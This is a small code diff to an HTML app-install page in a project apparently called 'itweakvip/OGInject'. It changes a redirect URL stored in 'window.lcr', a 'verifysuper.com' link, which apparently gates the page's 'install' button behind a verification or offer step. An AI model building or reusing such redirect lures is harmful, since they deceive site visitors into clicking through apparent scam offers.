--- a/itweakvip/OGInject/tutu.html
+++ b/itweakvip/OGInject/tutu.html
@@ -125,7 +125,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=574a524f176e3948dcb3c4f3878b405d";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
